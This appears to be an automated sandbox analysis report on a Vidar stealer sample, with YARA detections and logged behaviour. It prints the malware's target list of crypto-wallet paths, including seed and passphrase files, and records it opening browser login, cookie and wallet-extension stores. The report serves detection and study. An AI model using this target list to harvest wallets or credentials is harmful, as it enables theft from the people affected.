Source: Yara match File source: 00000021.00000002.3090234093.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2881702630.0000000000911000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.2841341620.0000000005100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.3026569663.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2122615907.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.3031855893.0000000005E01000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2882880413.000000000146E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.3087960505.0000000000911000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2492153777.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.3289871087.000000000153B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.2983198162.0000000008270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2489334528.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.3288030820.0000000000911000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6404, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 28d9ab8742.exe PID: 4068, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3daf81f16e.exe PID: 2724, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3daf81f16e.exe PID: 9140, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3daf81f16e.exe PID: 6076, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 6404, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 28d9ab8742.exe PID: 4068, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe, 00000000.00000002.2489334528.0000000000307000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2489334528.0000000000224000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \ElectronCash\wallets\
Source: file.exe, 00000000.00000002.2489334528.0000000000307000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2489334528.0000000000224000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Jaxx Desktop (old)
Source: file.exe, 00000000.00000002.2489334528.0000000000307000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2489334528.0000000000307000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2489334528.0000000000224000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2489334528.0000000000224000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: info.seco
Source: file.exe, 00000000.00000002.2489334528.0000000000307000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2489334528.0000000000224000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \jaxx\Local Storage\
Source: file.exe, 00000000.00000002.2489334528.0000000000307000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2489334528.0000000000307000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2489334528.0000000000224000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2489334528.0000000000224000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: file__0.localstorage
Source: file.exe, 00000000.00000002.2489334528.0000000000307000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2489334528.0000000000224000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe, 00000000.00000002.2489334528.0000000000224000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2489334528.0000000000224000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: MultiDoge
Source: file.exe, 00000000.00000002.2489334528.0000000000224000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: seed.seco
Source: file.exe, 00000000.00000002.2489334528.0000000000307000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2489334528.0000000000307000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
